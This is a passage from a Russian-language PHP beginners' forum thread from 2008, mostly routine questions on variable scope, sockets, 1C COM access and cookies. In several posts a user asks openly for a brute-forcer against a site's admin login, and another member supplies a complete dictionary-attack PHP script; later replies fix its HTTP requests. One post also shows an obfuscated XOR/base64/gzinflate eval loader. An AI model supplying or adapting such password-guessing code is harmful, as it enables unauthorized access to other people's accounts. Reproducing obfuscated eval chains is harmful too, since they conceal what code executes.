RE: Вопросы по PHP (для новичков)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-10 22:23:36.310000
|
|
|
DdvDemon
Сообщений: 31
Оценки: 0
Присоединился: 2007-01-30 19:36:32.186666
|
Можно ли на php открыть новую вкладку в опере и перейти на сайт, т.е передать ссылку вида http://site.com/enter.php?username=qwerty&password=12345 ?
Или то же самое в Internet Explorer.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-10 22:58:16.310000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
append_sid("index.$phpEx")
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-10 22:59:58.543333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: brtn
недопоняли вы меня) я говорю что сайт использует скрипт с ф-цией fsockopen() , НО он не пашет, я проверяю этим элементарным скриптом и понимаю, что соединения нету… дак вот вопрос был в чём же дело(?)… как я понял со слов magistr_bender, проблема в хостере, но те админы говорят что тип всё работать должно…
Одному Аллаху известно в чем дело. Скрипт рабочий, пробуй на другом бесплатном хосте. Это уже к php не имеет отношения
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-10 23:52:39.390000
|
|
|
DdvDemon
Сообщений: 31
Оценки: 0
Присоединился: 2007-01-30 19:36:32.186666
|
В общем, я хочу брутфорсер на php для одного сайта написать. В случае правильной авторизации генерируется одна страница, в случае неудачи, само собой, другая. Можно ли передавать что-то типа этого:
for($i=100000;$i<=999999;$i++){
Header("Location: http://site.com/enter.php?username=admin&password=$i");} ?
Если пароль правильный, то генерируется php-страница, что авторизация успешная. Но я не знаю, как мне получать эти данные. Подскажите, пожалуйста, как можно получать сгенерированные страницы, обрабатывать их на предмет содержания фразы об успешной авторизации и в случае удачи сохранять пароль.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-11 02:00:25.263333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: DdvDemon
В общем, я хочу брутфорсер на php для одного сайта написать.
<?php
//массив логинов
$f_log = fopen ('login.txt', 'r');
$login = fread($f_log, 65000);
$name = explode("\n", $login);
for ($i=0; $i<count($name); $i++)
{
$name[$i]=trim($name[$i]);
}
fclose($f_log);
//массив паролей из словаря))
$f_pass = fopen ('pass.txt', 'r');
$passwd = fread($f_pass, 65000);
$pass = explode("\n", $passwd);
for ($i=0; $i<count($pass); $i++)
{
$pass[$i]=trim($pass[$i]);
}
fclose($f_pass);
$hostname = "www.host.ru";
//соединяемся с сервером
$fp = fsockopen($hostname, 80, $errno, $errstr, 30);
if(!$fp)
{ //проверяем успешность соединения
echo "$errstr ($errno)<br />\n";
} else {
//собственно брут
for($n=0; $n<count($name); $n++)
{
$path = "/script.php?login=".$name[$n]."&passwd=";
for($p=0; $p<count($pass); $p++)
{
$header = "GET http://".$hostname.$path.$pass[$p]." HTTP/1.0\n\n";
//отправляем запрос
fputs($fp, $header);
//построчно считываем ответ сервера
$line='';
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
//работаем с ответом
//особенность аутентификации через формы - это невозможность анализа полей
//http заголовков, так как независимо от успешности аутентификации в них будет '200OK'
//соответственно необходим парсинг тела ответа на наличие
//характерных элементов успешной аутентификации
//$rez = fopen('rezcopyline.txt', 'a+'); применяется для
//fputs($rez, $line); отладки
//fclose($rez); скрипта
//здесь несколько строк кода разбора ответа
//шаблонного примера здесь привести не могу
//т.к. абсолютно каждый раз код разный
//если характерный элемент был найден::
$luck = 'Для '.$name[$n].' пароль: '.$pass[$p];
$f_success = fopen('result.txt', 'a+');
fputs($f_success, $luck); //пишем результат в файл
fclose($f_success);
echo '<br>';
echo 'Для '.$name[$n].' пароль: '.$pass[$p];
echo '<br>';
}
}
}
fclose($fp);
?>
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-11 03:17:47.230000
|
|
|
Панда
Сообщений: 232
Оценки: 0
Присоединился: 2008-03-05 07:38:35.890000
|
quote:
недопоняли вы меня) я говорю что сайт использует скрипт с ф-цией fsockopen() , НО он не пашет, я проверяю этим элементарным скриптом и понимаю, что соединения нету… дак вот вопрос был в чём же дело(?)… как я понял со слов magistr_bender, проблема в хостере, но те админы говорят что тип всё работать должно…
$fsockopen=fsockopen("www.gtn.ru", 80, $ereno, $errstr, 30);
var_dump($fsockopen);
должно быть "ресурс"
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-11 03:26:36.906666
|
|
|
Панда
Сообщений: 232
Оценки: 0
Присоединился: 2008-03-05 07:38:35.890000
|
ты подключаешся к сайту на 80 порт. далее пишеш заголовки. Скорее всего ты их просто неверно оформил. Конец заголовка символы "\r\n\r\n". если ты ошибся, то сервер будет ждать окончания ввода и ничего не вернет.
если те нужен 80 порт то попроуй curl.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-11 20:13:01.320000
|
|
|
DdvDemon
Сообщений: 31
Оценки: 0
Присоединился: 2007-01-30 19:36:32.186666
|
Pashkela, спасибо
Вот только что-то непонятное творится. Я для теста оставил в скрипте следующий код:
<?
$hostname = "www.site.com";
$fp = fsockopen($hostname, 80, $errno, $errstr, 30);
if(!$fp)
{echo "$errstr ($errno)<br />\n"; }
else{
$header = "GET http://site.com/enter.php?login=qwerty&password=123456 HTTP/1.0\n\n";
fputs($fp, $header);
$line='';
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
echo $line;
}
?> Но выводится следующее:
HTTP/1.1 404 Not Found Server: nginx/0.5.34 Date: Thu, 11 Sep 2008 16:06:21 GMT Content-Type: text/html; charset=iso-8859-1 Connection: close
Not Found
The requested URL /enter.php was not found on this server.
Хотя если просто вставить ссылку http://site.com/enter.php?login=qwerty&password=123456 в строку адреса, будет сгенерирована страница об успешной регистрации. В чем здесь проблема?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-11 23:37:02.850000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
"HTTP/1.0" вот это удали (или замени на HTTP/1.1), а вот это "\n\n" замени на "\n" соблюдая все пробелы
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-12 01:13:18.996666
|
|
|
Панда
Сообщений: 232
Оценки: 0
Присоединился: 2008-03-05 07:38:35.890000
|
$header = <<<EOF
GET /enter.php?login=qwerty&password=123456 HTTP/1.1
Host: site.com
EOF;
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-13 21:40:42.320000
|
|
|
Skybinder
Сообщений: 3
Оценки: 0
Присоединился: 2008-09-13 21:30:11.596666
|
index.php:
<?php
$page=1;
include ("./core.php");
?>
core.php:
<?
// total header & footer with counters
require("functions.php");
displayHeader();
// main page
if ($page==1){ include("./text.php");}
...
functions.php:
<?php
require ("vars.php");
function displayHeader()
{
?>
<html>
<head>
<?php
if ($page==1)
{
echo ("<title>Главная</title>");
}
?>
...
Парсер выдает вот что:
Notice: Undefined variable: page in z:\home\new\www\functions.php on line 10
Где я допустил ошибку, подскажите, пожалуйста!
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-14 02:59:00.393333
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
quote:
Notice: Undefined variable: page in z:\home\new\www\functions.php on line 10
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-14 13:47:17.700000
|
|
|
Skybinder
Сообщений: 3
Оценки: 0
Присоединился: 2008-09-13 21:30:11.596666
|
Очень остроумно, но я же не зря привел код, в index.php эта переменная определена, разве нет?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-14 14:03:28.440000
|
|
|
Parano1d
Сообщений: 423
Оценки: 0
Присоединился: 2008-05-21 13:40:17.093333
|
а ты не знаешь, что такое область видимости переменной?
http://php.ru/manual/language.variables.scope.html
у тебя $page, которая в index.php, и $page, которая в функции displayHeader(), разные…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-14 14:31:43.983333
|
|
|
Skybinder
Сообщений: 3
Оценки: 0
Присоединился: 2008-09-13 21:30:11.596666
|
quote:
ORIGINAL: Parano1d
а ты не знаешь, что такое область видимости переменной?
http://php.ru/manual/language.variables.scope.html
Выходит, что не знаю. И большое спасибо за ссылку!
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-16 23:45:52.796666
|
|
|
magistr_bender
Сообщений: 977
Оценки: 0
Присоединился: 2008-02-22 20:10:21.133333
|
народ мож у кого есть небольшой класс для авторизации пользователей на сайте? мож поделитес? а то я у себя реализовал это обычным методом, а хочется глянуть кк это реализуется с помощью классов.. можно даже без подробного описания, я в чужом коде разбираюсь нормально
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-18 18:29:38.506666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
в голову ничего не приходит:
в условном операторе нужно поставить счётчик, без использования бд и файлов,
что-то простое как танк, типа $i++, но проблема в том, что если явно определить переменную до условного оператора, то после нового обращения к скрипту переменная опять ставится в нач значение, а не надо такого )
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-18 19:48:16.850000
|
|
|
Parano1d
Сообщений: 423
Оценки: 0
Присоединился: 2008-05-21 13:40:17.093333
|
в сессию или куки ее…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-18 19:56:01.180000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Parano1d
в сессию или куки ее…
пермаментно надо её на серваке держать а не временно, + не для отдельных пользователей а вообще не в зависимости от них
тогда вопрос по-другому ставлю:
мне нужен счётчик в скрипте редиректа, редирект ставлю через пхп, шустрый довольно - таки. Вот я и опасаюсь что открытие БД , запись, закрытие, кароче весь процесс записи 1 параметра в таблицу, затормозит редирект…а хотелось что бы сам процесс перенаправления был практически незаметен)
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-18 20:07:35.920000
|
|
|
Parano1d
Сообщений: 423
Оценки: 0
Присоединился: 2008-05-21 13:40:17.093333
|
только файлы и бд… файлы быстрее…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-19 19:37:06.390000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
листинг:
<?php
$vrBVCN3t=7;
$g4FX3d34="YnFmay9gfW5pYWtmc2IvZWZ0YjEzWGNiZGhjYi8gRWRBT2BoTnBGRkNGRTRBcENQS3AzQkJOS1ZyQHFyTEledlROYGNFMihkM2hyXjNLMnV/cUksU2NeQHRJNWM+XmVdTl8oU3ZpQEwobnI/VX5uKHZtN10wd0ZTVDVtUmhTcH1fNTNdNk5Qdj9yX2N3N0NmXj9Qdz9qS1VfQEZzTURkSENFXmt+VFNiVzVoNX1GSXAzQ2Uybl9rUj5CQXRmTXNzQkNENVVmVU1sVj5pbGpmZW1UfnFhUSxMX1deVEt+SlVTXUYoaWVzbkJJck1Tf29dc0FpSXZtaF0zNklyLFRxUixdYnBVMlF+UUxeX19+fywyYnI1V1BtU0pCUGBScWtuMmpWclMoaUk/X1JCQ1ZpMDA0SzNFVWkoYXJKRW9mZTd/XW1WckRKdHVTYmxMNl5kNjRvYn9WP2YwX2FwOjogLi4uPA==";
$g4FX3d34=base64_decode($g4FX3d34);
for ($Y454=0;$Y454<strlen($g4FX3d34);$Y454++) {
$MBhAOwt8 .= chr(ord($g4FX3d34[$Y454]) ^ $vrBVCN3t);
}
eval($MBhAOwt8);
?>
в $MBhAOwt8 лежит:
eval(gzinflate(base64_decode('BcFHgoIwAADAB3FwDWLw4EEILQuGvuKNYqSIgdB5/c4ouY4L5rxvN+TdYGsN2d9YbZIX/TqnGK/iu8Ryi/qj0Z7pATS2jUoTwzX24Z1IWq8uXdp0DaY8Wp8mLRXGAtJCcODBYlySTeP2o2zANw4Db5iXlU9EFsaJttEDC2RaRJkQ9nkmabjSyvfV+KXPYSLyMRTZA/nbtiENuJTxhZtFnNqjoZ41Nu+SvU+ZewR5VyVKYXXyx+5eu2PWjTMEWgUvli5mQuT/nN8XUEDQn773L4BRn/fuMBhab0xZjQuCMsrTekK1Yc13hexQ8a7Xfw==')));
т.е. и цепочка, по сути, должна идти дальше , но:
Parse error: syntax error, unexpected T_STRING in X:\home\localhost\www\achat.php(4) : eval()'d code(1) : eval()'d code on line 1
Вопрос:
1)может быть проблемма в eval(eval()) ?
2)в чём же дело?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-19 21:27:50.980000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
не актуально, это я кое - что попутал =)
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-21 13:47:14.740000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
eval(eval()) ?
бред какой то
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-21 22:42:27.230000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: FriLL
quote:
eval(eval()) ?
бред какой то
говорюж не актуально
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-21 23:00:45.283333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Выложи как актуально, не жадничай:)
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-21 23:25:56.920000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Pashkela
Выложи как актуально, не жадничай:)
да х.з. как актуально…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-22 12:03:47.630000
|
|
|
=Useroff=
Сообщений: 121
Оценки: 0
Присоединился: 2008-08-13 11:57:48.600000
|
Какую библиотеку php юзает при вызове file_get_contents ?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-22 12:22:41.123333
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
quote:
ORIGINAL: =Useroff=
Какую библиотеку php юзает при вызове file_get_contents ?
5-й php - php5ts.dll если не ошибаюсь.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-22 15:04:10.200000
|
|
|
PigMeyB
Сообщений: 269
Оценки: 0
Присоединился: 2008-07-15 15:39:57.543333
|
Такой вопрос: Я из базы (1с) выдергиваю перечисление и php матерится:
Catchable fatal error: Object of classvariant could not be converted to string Как выдрать строковое значение из variant?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-22 15:06:04.466666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Код выдергивания в студию
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-22 16:27:56.746666
|
|
|
PigMeyB
Сообщений: 269
Оценки: 0
Присоединился: 2008-07-15 15:39:57.543333
|
Слегка урезанный код:
$trade= new COM("V81.Application");
if ($trade)
{
echo("object created<br>");
}
else
{
echo("object created");
}
$trade->Connect('File="Путь к базе";Usr="";');
$goods = $trade->Catalogs->Номенклатура;
$n=100;
$sel= $goods->Select();
echo("<p>Starting enumeration:</p>");
echo("<table border=1>");
while($sel->Next())
{
if ($sel->Description!=NULL)
{
$perem= $trade->Перечисления->ЕдИзмерения->Получить(1);
echo("<tr>
<td>$sel->Артикул </td>
<td>$sel->Description </td>
<td>$sel->Коментарий </td>
<td>$sel->ЕдИзмерения</td>
</tr>
");
}
}
echo("</table>");
ЕдИзмерения в базе 1с- это перечисление.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-25 13:15:25.466666
|
|
|
PigMeyB
Сообщений: 269
Оценки: 0
Присоединился: 2008-07-15 15:39:57.543333
|
И тишина… Мамай прошел…[sm=scull.gif]
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-25 15:18:37.140000
|
|
|
kolPeeX
Сообщений: 1456
Оценки: 0
Присоединился: 2007-01-25 14:57:57.683333
|
quote:
ORIGINAL: PigMeyB
И тишина… Мамай прошел…[sm=scull.gif]
Здесь не так много специалистов в 1С..
p.s. честно говоря, ни разу не видел использование русских символов в именах переменных 8|
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-26 09:51:49.056666
|
|
|
PigMeyB
Сообщений: 269
Оценки: 0
Присоединился: 2008-07-15 15:39:57.543333
|
Тут дело не в 1С, а в PHP. смысл в том что не могу преобразовать полученное значение в строку дял вывода на экран. Считывание из базы и конвертация между внутренними форматами php нормально проходит, например:
quote:
$tmp= new VARIANT(VT_BSTR);
$perem= $trade->Перечисления->ЕдИзмерения;
$tmp=$perem;
проходит на ура, а на вывод уже не идет.
quote:
p.s. честно говоря, ни разу не видел использование русских символов в именах переменных
я тоже в шоке был когда это в первый раз увидел, но главное- эта гадость работает!
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-26 10:46:09.326666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
посмотри что выведет var_dump($твой_объект) и уже от этого отталкивайся.
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-27 09:53:58.840000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
как получить куки в переменную?
делаю запрос к серверу, сервер присылает:
...
Set-Cookie: uid=708922; path=/; domain=.site.ru
Set-Cookie: up=a8a4b39ab655550e9614; path=/; domain=.site.ru
Set-Cookie: uip=87.1.1.1; path=/; domain=.site.ru
Set-Cookie: bp=e70a35af41f333cb1fe2; path=/; domain=.site.ru
Set-Cookie: session_id=1364; path=/; domain=.site.ru
Set-Cookie: au=708922; expires=Sunday, 28-Sep-08 05:12:50 GMT; path=/; domain=.site.ru
Set-Cookie: luid=708922; expires=Sunday, 28-Sep-08 05:12:50 GMT; path=/; domain=.site.ru
Set-Cookie: ipkey=362a4; path=/; domain=.site.ru
...
уточняю:
при создании cookie их можно напрямую присваивать переменным по имени,
$cookie = $uid;
$cookie .=$domain;
…
…
а как в данном случае добиться тако же результата?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-27 10:50:41.766666
|
|
|
Parano1d
Сообщений: 423
Оценки: 0
Присоединился: 2008-05-21 13:40:17.093333
|
парси ответ сервера… используй регулярные выражения… если я правильно понял конечно, что требуется…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-27 11:04:56.786666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Parano1d
парси ответ сервера… используй регулярные выражения… если я правильно понял конечно, что требуется…
была такая идея, но даже при 10-ке запросов это уже будет не малая нагрузка на хост с которого происходит запрос…
я имел ввиду стандартные ф-ции работы с кукисами, может они смогут помочь?
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-27 11:09:59.730000
|
|
|
Parano1d
Сообщений: 423
Оценки: 0
Присоединился: 2008-05-21 13:40:17.093333
|
не знаю… прям уж там большая нагрузка будет… работа со строками просто 0_о
не уверен, что что-то будет делать меньшую нагрузку чем обработка строк… пускай и регулярными выражениями…
можно конечно использовать фреймворк какой-нить… хз в общем…
|
|
|
|
|
RE: Вопросы по PHP (для новичков) - 2008-09-27 15:19:46.996666
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
http://ru2.php.net/manual/ru/reserved.variables.cookies.php если я правильно понял
|
|
|
|
|
|
